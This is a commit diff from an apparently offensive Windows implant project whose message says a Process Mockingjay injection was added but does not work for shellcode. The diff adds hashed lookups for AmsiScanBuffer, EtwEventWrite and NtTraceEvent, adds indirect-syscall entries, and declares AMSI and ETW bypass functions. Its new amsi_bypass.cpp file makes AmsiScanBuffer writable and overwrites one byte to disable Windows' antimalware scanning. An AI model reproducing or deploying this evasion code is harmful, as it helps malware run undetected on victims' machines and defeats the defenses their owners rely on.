Added Process Mockingjay but not working for shellcode implant

payload/win/implant/CMakeLists.txt

@@ -122,7 +122,9 @@ set(SOURCE_CORE
         src/core/task/upload.cpp
         src/core/task/user.cpp
         src/core/task/whoami.cpp
+        src/core/technique/amsi_bypass.cpp
         src/core/technique/anti_debug.cpp
+        src/core/technique/etw_bypass.cpp
         src/core/technique/injection/dll_injection.cpp
         src/core/technique/injection/pe_injection.cpp
         src/core/technique/injection/shellcode_injection.cpp

payload/win/implant/include/core/modules.hpp

@@ -23,6 +23,7 @@ namespace Modules
     struct MODULES
     {
         HMODULE hAdvapi32;
+        HMODULE hAmsi;
         HMODULE hBcrypt;
         HMODULE hCrypt32;
         HMODULE hDbghelp;

payload/win/implant/include/core/nt.hpp

@@ -39,9 +39,9 @@ namespace Nt
 
     #define RTL_MAX_DRIVE_LETTERS 32
 
-    typedef PVOID* PPVOID;
-
     typedef LONG KPRIORITY, *PKPRIORITY;
+    typedef PVOID* PPVOID;
+    typedef ULONGLONG REGHANDLE, *PREGHANDLE;
 
     typedef enum _SYSTEM_INFORMATION_CLASS
     {
@@ -751,6 +751,21 @@ namespace Nt
         // SYSTEM_EXTENDED_THREAD_INFORMATION + SYSTEM_PROCESS_INFORMATION_EXTENSION // SystemFullProcessInformation
     } SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
 
+    typedef struct _EVENT_DESCRIPTOR
+    {
+        USHORT Id;
+        UCHAR Version;
+        UCHAR Channel;
+        UCHAR Level;
+        UCHAR Opcode;
+        USHORT Task;
+        ULONGLONG Keyword;
+    } EVENT_DESCRIPTOR, *PEVENT_DESCRIPTOR;
+
+    typedef struct _EVENT_DATA_DESCRIPTOR EVENT_DATA_DESCRIPTOR, *PEVENT_DATA_DESCRIPTOR;
+
+    typedef const EVENT_DESCRIPTOR* PCEVENT_DESCRIPTOR;
+
     typedef struct _PROCESSOR_NUMBER {
     WORD Group;
     BYTE Number;

payload/win/implant/include/core/procs.hpp

@@ -19,6 +19,7 @@
 #define RANDOM_ADDR                             0xab10f29f
 
 // Generated by script/calc_hash_func.py
+#define HASH_FUNC_ETWEVENTWRITE                 0xaa1b5078
 #define HASH_FUNC_LDRLOADDLL                    0x19cb5e59
 #define HASH_FUNC_NTADJUSTPRIVILEGESTOKEN       0x1b79f58d
 #define HASH_FUNC_NTALLOCATEVIRTUALMEMORY       0xf8829394
@@ -53,6 +54,7 @@
 #define HASH_FUNC_NTSETINFORMATIONPROCESS       0xb5d02d0a
 #define HASH_FUNC_NTSYSTEMDEBUGCONTROL          0x4def6394
 #define HASH_FUNC_NTTERMINATEPROCESS            0xc58a7b49
+#define HASH_FUNC_NTTRACEEVENT                  0xaea11c90
 #define HASH_FUNC_NTUNMAPVIEWOFSECTION          0x574e9fc1
 #define HASH_FUNC_NTWAITFORSINGLEOBJECT         0x73c87a00
 #define HASH_FUNC_NTWRITEFILE                   0x9339e2e0
@@ -71,6 +73,7 @@
 #define HASH_FUNC_RTLZEROMEMORY                 0x899c0d1e
 
 #define HASH_FUNC_ADJUSTTOKENPRIVILEGES         0x667f28f7
+#define HASH_FUNC_AMSISCANBUFFER                0xb2f48854
 #define HASH_FUNC_BCRYPTCLOSEALGORITHMPROVIDER  0x34507089
 #define HASH_FUNC_BCRYPTDECRYPT                 0x8f0ca18c
 #define HASH_FUNC_BCRYPTDESTROYKEY              0xb3e3d126
@@ -195,6 +198,8 @@ namespace Procs
 {
     // **NATIVE APIs**
 
+    // EdwEventWrite
+    typedef NTSTATUS (NTAPI* LPPROC_ETWEVENTWRITE)(Nt::REGHANDLE RegHandle, Nt::PCEVENT_DESCRIPTOR EventDescriptor, ULONG UserDataCount, Nt::PEVENT_DATA_DESCRIPTOR UserData);
     // LdrLoadDll
     typedef NTSTATUS (NTAPI* LPPROC_LDRLOADDLL)(PWSTR DllPath, PULONG DllCharacteristics, Nt::PUNICODE_STRING DllName, PVOID *DllHandle);
     // NtAdjustPrivilegesToken
@@ -261,6 +266,8 @@ namespace Procs
     typedef NTSTATUS (NTAPI* LPPROC_NTSYSTEMDEBUGCONTROL)(Nt::SYSDBG_COMMAND Command, PVOID InputBuffer, ULONG InputBufferLength, PVOID OutputBuffer, ULONG OutputBufferLength, PULONG ReturnLength);
     // NtTerminateProcess
 	typedef NTSTATUS (NTAPI* LPPROC_NTTERMINATEPROCESS)(HANDLE ProcessHandle, NTSTATUS ExitStatus);
+    // NtTraceEvent
+    typedef NTSTATUS (NTAPI* LPPROC_NTTRACEEVENT)(HANDLE TraceHandle, ULONG Flags, ULONG FieldSize, PVOID Fields);
     // NtUnmapViewOfSection
     typedef NTSTATUS (NTAPI* LPPROC_NTUNMAPVIEWOFSECTION)(HANDLE ProcessHandle, PVOID BaseAddress);
     // NtWaitForSingleObject
@@ -296,6 +303,8 @@ namespace Procs
 
     // AdjustTokenPrivileges
     typedef BOOL (WINAPI* LPPROC_ADJUSTTOKENPRIVILEGES)(HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
+    // AmsiScanBuffer
+    typedef HRESULT (WINAPI* LPPROC_AMSISCANBUFFER)(HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT *result);
     // BCryptCloseAlgorithmProvider
     typedef NTSTATUS (WINAPI* LPPROC_BCRYPTCLOSEALGORITHMPROVIDER)(BCRYPT_ALG_HANDLE hAlgorithm, ULONG dwFlags);
     // BCryptDecrypt
@@ -534,6 +543,7 @@ namespace Procs
     struct PROCS
     {
         // **NTAPI**
+        LPPROC_ETWEVENTWRITE                lpEtwEventWrite                     = nullptr;
         LPPROC_LDRLOADDLL                   lpLdrLoadDll                        = nullptr;
         LPPROC_NTADJUSTPRIVILEGESTOKEN      lpNtAdjustPrivilegesToken           = nullptr;
         LPPROC_NTALLOCATEVIRTUALMEMORY      lpNtAllocateVirtualMemory           = nullptr;
@@ -545,6 +555,7 @@ namespace Procs
         LPPROC_NTDELETEFILE                 lpNtDeleteFile                      = nullptr;
         LPPROC_NTDUPLICATEOBJECT            lpNtDuplicateObject                 = nullptr;
         LPPROC_NTENUMERATEVALUEKEY          lpNtEnumerateValueKey               = nullptr;
+        LPPROC_NTFLUSHINSTRUCTIONCACHE      lpNtFlushInstructionCache           = nullptr;
         LPPROC_NTFREEVIRTUALMEMORY          lpNtFreeVirtualMemory               = nullptr;
         LPPROC_NTGETCONTEXTTHREAD           lpNtGetContextThread                = nullptr;
         LPPROC_NTOPENFILE                   lpNtOpenFile                        = nullptr;
@@ -566,6 +577,7 @@ namespace Procs
         LPPROC_NTSETINFORMATIONPROCESS      lpNtSetInformationProcess           = nullptr;
         LPPROC_NTSYSTEMDEBUGCONTROL         lpNtSystemDebugControl              = nullptr;
         LPPROC_NTTERMINATEPROCESS           lpNtTerminateProcess                = nullptr;
+        LPPROC_NTTRACEEVENT                 lpNtTraceEvent                      = nullptr;
         LPPROC_NTUNMAPVIEWOFSECTION         lpNtUnmapViewOfSection              = nullptr;
         LPPROC_NTWAITFORSINGLEOBJECT        lpNtWaitForSingleObject             = nullptr;
         LPPROC_NTWRITEFILE                  lpNtWriteFile                       = nullptr;
@@ -584,6 +596,7 @@ namespace Procs
 
         // **WINAPI**
         LPPROC_ADJUSTTOKENPRIVILEGES        lpAdjustTokenPrivileges             = nullptr;
+        LPPROC_AMSISCANBUFFER               lpAmsiScanBuffer                    = nullptr;
         LPPROC_BCRYPTCLOSEALGORITHMPROVIDER lpBCryptCloseAlgorithmProvider      = nullptr;
         LPPROC_BCRYPTDECRYPT                lpBCryptDecrypt                     = nullptr;
         LPPROC_BCRYPTDESTROYKEY             lpBCryptDestroyKey                  = nullptr;
@@ -680,6 +693,7 @@ namespace Procs
         LPPROC_UPDATEWINDOW                 lpUpdateWindow                      = nullptr;
         LPPROC_VIRTUALALLOCEX               lpVirtualAllocEx                    = nullptr;
         LPPROC_VIRTUALFREE                  lpVirtualFree                       = nullptr;
+        LPPROC_VIRTUALPROTECT               lpVirtualProtect                    = nullptr;
         LPPROC_VIRTUALPROTECTEX             lpVirtualProtectEx                  = nullptr;
         LPPROC_WINHTTPCLOSEHANDLE           lpWinHttpCloseHandle                = nullptr;
         LPPROC_WINHTTPCONNECT               lpWinHttpConnect                    = nullptr;
@@ -697,6 +711,7 @@ namespace Procs
         LPPROC_WSASTARTUP                   lpWSAStartup                        = nullptr;
 
         // **SYSCALLS**
+        Syscalls::SYSCALL                   sysEtwEventWrite                    = {0};
         Syscalls::SYSCALL                   sysLdrLoadDll                       = {0};
         Syscalls::SYSCALL                   sysNtAdjustPrivilegesToken          = {0};
         Syscalls::SYSCALL                   sysNtAllocateVirtualMemory          = {0};
@@ -708,6 +723,7 @@ namespace Procs
         Syscalls::SYSCALL                   sysNtDeleteFile                     = {0};
         Syscalls::SYSCALL                   sysNtDuplicateObject                = {0};
         Syscalls::SYSCALL                   sysNtEnumerateValueKey              = {0};
+        Syscalls::SYSCALL                   sysNtFlushInstructionCache          = {0};
         Syscalls::SYSCALL                   sysNtFreeVirtualMemory              = {0};
         Syscalls::SYSCALL                   sysNtGetContextThread               = {0};
         Syscalls::SYSCALL                   sysNtOpenFile                       = {0};
@@ -729,6 +745,7 @@ namespace Procs
         Syscalls::SYSCALL                   sysNtSetInformationProcess          = {0};
         Syscalls::SYSCALL                   sysNtSystemDebugControl             = {0};
         Syscalls::SYSCALL                   sysNtTerminateProcess               = {0};
+        Syscalls::SYSCALL                   sysNtTraceEvent                     = {0};
         Syscalls::SYSCALL                   sysNtUnmapViewOfSection             = {0};
         Syscalls::SYSCALL                   sysNtWaitForSingleObject            = {0};
         Syscalls::SYSCALL                   sysNtWriteFile                      = {0};
@@ -757,6 +774,7 @@ namespace Procs
     VOID FindProcsMisc(
         Procs::PPROCS pProcs,
         HMODULE hAdvapi32,
+        HMODULE hAmsi,
         HMODULE hBcrypt,
         HMODULE hCrypt32,
         HMODULE hDbghelp,

payload/win/implant/include/core/technique.hpp

@@ -16,11 +16,21 @@ typedef BOOL (WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
 #define FLG_HEAP_VALIDATE_PARAMETERS 0x40
 #define NT_GLOBAL_FLAG_DEBUGGED (FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS)
 
+namespace Technique::AmsiBypass
+{
+    BOOL PatchAmsi(Procs::PPROCS pProcs);
+}
+
 namespace Technique::AntiDebug
 {
     VOID StopIfDebug(Procs::PPROCS pProcs);
 }
 
+namespace Technique::EtwBypass
+{
+    BOOL PatchEtw(Procs::PPROCS pProcs);
+}
+
 namespace Technique::Injection::Helper
 {
     DWORD Rva2Offset(DWORD dwRva, UINT_PTR uBaseAddr);

payload/win/implant/include/core/win32.hpp

@@ -5,6 +5,21 @@
 #define MAX_ADAPTER_ADDRESS_LENGTH      8
 #define MAX_DHCPV6_DUID_LENGTH          130
 
+// ------------------------------------------------------------------
+// amsi.h
+// ------------------------------------------------------------------
+
+typedef HANDLE HAMSICONTEXT;
+typedef HANDLE HAMSISESSION;
+
+typedef enum {
+  AMSI_RESULT_CLEAN,
+  AMSI_RESULT_NOT_DETECTED,
+  AMSI_RESULT_BLOCKED_BY_ADMIN_START,
+  AMSI_RESULT_BLOCKED_BY_ADMIN_END,
+  AMSI_RESULT_DETECTED
+} AMSI_RESULT;
+
 // ------------------------------------------------------------------
 // ifdef.h
 // ------------------------------------------------------------------

payload/win/implant/script/calc_hash_func.py

@@ -2,6 +2,7 @@
 
 FUNCS = [
     # NTAPI
+    "EtwEventWrite",
     "LdrLoadDll",
     "NtAdjustPrivilegesToken",
     "NtAllocateVirtualMemory",
@@ -36,6 +37,7 @@
     "NtSetInformationProcess",
     "NtSystemDebugControl",
     "NtTerminateProcess",
+    "NtTraceEvent",
     "NtUnmapViewOfSection",
     "NtWaitForSingleObject",
     "NtWriteFile",
@@ -54,6 +56,7 @@
 
     # WINAPI
     "AdjustTokenPrivileges",
+    "AmsiScanBuffer",
     "BCryptCloseAlgorithmProvider",
     "BCryptDecrypt",
     "BCryptDestroyKey",

payload/win/implant/src/core/modules.cpp

@@ -96,6 +96,7 @@ namespace Modules
     VOID Free(PMODULES pModules, Procs::PPROCS pProcs)
     {
         pProcs->lpFreeLibrary(pModules->hAdvapi32);
+        pProcs->lpFreeLibrary(pModules->hAmsi);
         pProcs->lpFreeLibrary(pModules->hBcrypt);
         pProcs->lpFreeLibrary(pModules->hCrypt32);
         pProcs->lpFreeLibrary(pModules->hDbghelp);

payload/win/implant/src/core/procs.cpp

@@ -59,6 +59,8 @@ namespace Procs
         BOOL bIndirectSyscalls
     ) {
         // NTAPI (Ntdll)
+        PVOID pEtwEventWrite                    = GetProcAddressByHash(hNtdll, HASH_FUNC_ETWEVENTWRITE);
+        pProcs->lpEtwEventWrite                 = reinterpret_cast<LPPROC_ETWEVENTWRITE>(pEtwEventWrite);
         PVOID pLdrLoadDll                       = GetProcAddressByHash(hNtdll, HASH_FUNC_LDRLOADDLL);
         pProcs->lpLdrLoadDll                    = reinterpret_cast<LPPROC_LDRLOADDLL>(pLdrLoadDll);
         PVOID pNtAdjustPrivilegesToken          = GetProcAddressByHash(hNtdll, HASH_FUNC_NTADJUSTPRIVILEGESTOKEN);
@@ -83,6 +85,8 @@ namespace Procs
         pProcs->lpNtEnumerateValueKey           = reinterpret_cast<LPPROC_NTENUMERATEVALUEKEY>(pNtEnumerateValueKey);
         PVOID pNtFreeVirtualMemory              = GetProcAddressByHash(hNtdll, HASH_FUNC_NTFREEVIRTUALMEMORY);
         pProcs->lpNtFreeVirtualMemory           = reinterpret_cast<LPPROC_NTFREEVIRTUALMEMORY>(pNtFreeVirtualMemory);
+        PVOID pNtFlushInstructionCache          = GetProcAddressByHash(hNtdll, HASH_FUNC_NTFLUSHINSTRUCTIONCACHE);
+        pProcs->lpNtFlushInstructionCache       = reinterpret_cast<LPPROC_NTFLUSHINSTRUCTIONCACHE>(pNtFlushInstructionCache);
         PVOID pNtGetContextThread               = GetProcAddressByHash(hNtdll, HASH_FUNC_NTGETCONTEXTTHREAD);
         pProcs->lpNtGetContextThread            = reinterpret_cast<LPPROC_NTGETCONTEXTTHREAD>(pNtGetContextThread);
         PVOID pNtOpenFile                       = GetProcAddressByHash(hNtdll, HASH_FUNC_NTOPENFILE);
@@ -121,6 +125,8 @@ namespace Procs
         pProcs->lpNtSystemDebugControl          = reinterpret_cast<LPPROC_NTSYSTEMDEBUGCONTROL>(pNtSystemDebugControl);
         PVOID pNtTerminateProcess               = GetProcAddressByHash(hNtdll, HASH_FUNC_NTTERMINATEPROCESS);
         pProcs->lpNtTerminateProcess            = reinterpret_cast<LPPROC_NTTERMINATEPROCESS>(pNtTerminateProcess);
+        PVOID pNtTraceEvent                     = GetProcAddressByHash(hNtdll, HASH_FUNC_NTTRACEEVENT);
+        pProcs->lpNtTraceEvent                  = reinterpret_cast<LPPROC_NTTRACEEVENT>(pNtTraceEvent);
         PVOID pNtUnmapViewOfSection             = GetProcAddressByHash(hNtdll, HASH_FUNC_NTUNMAPVIEWOFSECTION);
         pProcs->lpNtUnmapViewOfSection          = reinterpret_cast<LPPROC_NTUNMAPVIEWOFSECTION>(pNtUnmapViewOfSection);
         PVOID pNtWaitForSingleObject            = GetProcAddressByHash(hNtdll, HASH_FUNC_NTWAITFORSINGLEOBJECT);
@@ -245,13 +251,16 @@ namespace Procs
         pProcs->lpVirtualAllocEx                = reinterpret_cast<LPPROC_VIRTUALALLOCEX>(pVirtualAllocEx);
         PVOID pVirtualFree                      = GetProcAddressByHash(hKernel32, HASH_FUNC_VIRTUALFREE);
         pProcs->lpVirtualFree                   = reinterpret_cast<LPPROC_VIRTUALFREE>(pVirtualFree);
+        PVOID pVirtualProtect                   = GetProcAddressByHash(hKernel32, HASH_FUNC_VIRTUALPROTECT);
+        pProcs->lpVirtualProtect                = reinterpret_cast<LPPROC_VIRTUALPROTECT>(pVirtualProtect);
         PVOID pVirtualProtectEx                 = GetProcAddressByHash(hKernel32, HASH_FUNC_VIRTUALPROTECTEX);
         pProcs->lpVirtualProtectEx              = reinterpret_cast<LPPROC_VIRTUALPROTECTEX>(pVirtualProtectEx);
         PVOID pWriteProcessMemory               = GetProcAddressByHash(hKernel32, HASH_FUNC_WRITEPROCESSMEMORY);
         pProcs->lpWriteProcessMemory            = reinterpret_cast<LPPROC_WRITEPROCESSMEMORY>(pWriteProcessMemory);
 
         if (bIndirectSyscalls)
         {
+            pProcs->sysEtwEventWrite                = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pEtwEventWrite));
             pProcs->sysLdrLoadDll                   = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pLdrLoadDll));
             pProcs->sysNtAdjustPrivilegesToken      = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtAdjustPrivilegesToken));
             pProcs->sysNtAllocateVirtualMemory      = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtAllocateVirtualMemory));
@@ -263,6 +272,7 @@ namespace Procs
             pProcs->sysNtDeleteFile                 = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtDeleteFile));
             pProcs->sysNtDuplicateObject            = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtDuplicateObject));
             pProcs->sysNtEnumerateValueKey          = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtEnumerateValueKey));
+            pProcs->sysNtFlushInstructionCache      = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtFlushInstructionCache));
             pProcs->sysNtFreeVirtualMemory          = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtFreeVirtualMemory));
             pProcs->sysNtGetContextThread           = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtGetContextThread));
             pProcs->sysNtOpenFile                   = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtOpenFile));
@@ -282,8 +292,9 @@ namespace Procs
             pProcs->sysNtSetContextThread           = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtSetContextThread));
             pProcs->sysNtSetInformationFile         = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtSetInformationFile));
             pProcs->sysNtSystemDebugControl         = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtSystemDebugControl));
-            pProcs->sysNtUnmapViewOfSection         = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtUnmapViewOfSection));
             pProcs->sysNtTerminateProcess           = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtTerminateProcess));
+            pProcs->sysNtTraceEvent                 = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtTraceEvent));
+            pProcs->sysNtUnmapViewOfSection         = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtUnmapViewOfSection));
             pProcs->sysNtWaitForSingleObject        = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtWaitForSingleObject));
             pProcs->sysNtWriteFile                  = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtWriteFile));
             pProcs->sysNtWriteVirtualMemory         = Syscalls::FindSyscall(reinterpret_cast<UINT_PTR>(pNtWriteVirtualMemory));
@@ -298,6 +309,7 @@ namespace Procs
     VOID FindProcsMisc(
         Procs::PPROCS pProcs,
         HMODULE hAdvapi32,
+        HMODULE hAmsi,
         HMODULE hBcrypt,
         HMODULE hCrypt32,
         HMODULE hDbghelp,
@@ -348,6 +360,10 @@ namespace Procs
         PVOID pRevertToSelf                     = GetProcAddressByHash(hAdvapi32, HASH_FUNC_REVERTTOSELF);
         pProcs->lpRevertToSelf                  = reinterpret_cast<LPPROC_REVERTTOSELF>(pRevertToSelf);
 
+        // Amsi
+        PVOID pAmsiScanBuffer                   = GetProcAddressByHash(hAmsi, HASH_FUNC_AMSISCANBUFFER);
+        pProcs->lpAmsiScanBuffer                = reinterpret_cast<LPPROC_AMSISCANBUFFER>(pAmsiScanBuffer);
+
         // Bcrypt
         PVOID pBCryptCloseAlgorithmProvider     = GetProcAddressByHash(hBcrypt, HASH_FUNC_BCRYPTCLOSEALGORITHMPROVIDER);
         pProcs->lpBCryptCloseAlgorithmProvider  = reinterpret_cast<LPPROC_BCRYPTCLOSEALGORITHMPROVIDER>(pBCryptCloseAlgorithmProvider);

payload/win/implant/src/core/technique/amsi_bypass.cpp

@@ -0,0 +1,30 @@
+#include "core/technique.hpp"
+
+namespace Technique::AmsiBypass
+{
+    BOOL PatchAmsi(Procs::PPROCS pProcs)
+    {
+        DWORD dwOldProtect = 0;
+        DWORD dwOffset = 0x83;
+
+        if (!pProcs->lpVirtualProtect(
+            (PVOID*)pProcs->lpAmsiScanBuffer + dwOffset,
+            1,
+            PAGE_EXECUTE_READWRITE,
+            &dwOldProtect
+        )) {
+            return FALSE;
+        }
+        memcpy((PVOID*)pProcs->lpAmsiScanBuffer + dwOffset, "\x72", 1);
+        if (!pProcs->lpVirtualProtect(
+            (PVOID*)pProcs->lpAmsiScanBuffer + dwOffset,
+            1,
+            dwOldProtect,
+            &dwOldProtect
+        )) {
+            return FALSE;
+        }
+
+        return TRUE;
+    }
+}